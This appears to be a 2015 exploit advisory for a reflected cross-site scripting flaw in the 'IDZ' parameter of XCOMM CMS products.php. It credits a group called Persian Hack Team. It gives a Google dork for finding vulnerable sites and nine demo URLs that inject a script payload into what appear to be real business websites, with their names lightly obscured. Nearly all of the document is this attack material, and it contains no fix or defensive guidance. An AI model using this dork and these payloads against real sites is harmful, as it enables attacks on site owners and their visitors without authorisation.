######################
# Exploit Title : XCOMM CMS XSS Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://xcomm.net.pk/
# Google Dork : "Designed & Developed by: XCOMM" inurl:/products.php?IDZ=
# Date : 2015/12/05
# Version : 3.3.0 And Lower
#
######################
#
# Vulnerable Paramter products.php?IDZ=XSS
#
# Demo:
#
#http://www.thrivXe-intl.com/products.php?IDZ=2-36-0-0-0-0-1%22%3E%3Cscript%3Ealert%28%22Mobham%22%29%3C/script%3E
#
#http://aabusineXsstrend.com/products.php?IDZ=3-0-0-0-38-0-1-1%22%3E%3Cscript%3Ealert%28%22Mobham%22%29%3C/script%3E
#
#http://spillerspXorts.com/products.php?IDZ=1-1-0-0-0-0-1%22%3E%3Cscript%3Ealert%28%22Mobham%22%29%3C/script%3E
#
#http://rehmaXni-sports.com/products.php?IDZ=1-39-0-92-0-0-1%22%3E%3Cscript%3Ealert%28%22Mobham%22%29%3C/script%3E
#
#http://wwwX.siwijas.com/products.php?IDZ=1-1-0-0-0-0-1%22%3E%3Cscript%3Ealert%28%22Mobham%22%29%3C/script%3E
#
#http://wwXw.kmazdy.com/products.php?IDZ=1-1-0-0-0-0-1%22%3E%3Cscript%3Ealert%28%22Mobham%22%29%3C/script%3E
#
#http://wXww.albaghinds.com/products.php?IDZ=1-3-0-0-0-0-1%22%3E%3Cscript%3Ealert%28%22Mobham%22%29%3C/script%3E
#
#http://sXafnimpex.com/products.php?IDZ=12-49-0-0-0-0-1%22%3E%3Cscript%3Ealert%28%22Mobham%22%29%3C/script%3E
#
#http://Xroyal-badges.com/products.php?IDZ=3-0-0-0-5-0-1-3%22%3E%3Cscript%3Ealert%28%22Mobham%22%29%3C/script%3E
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
######################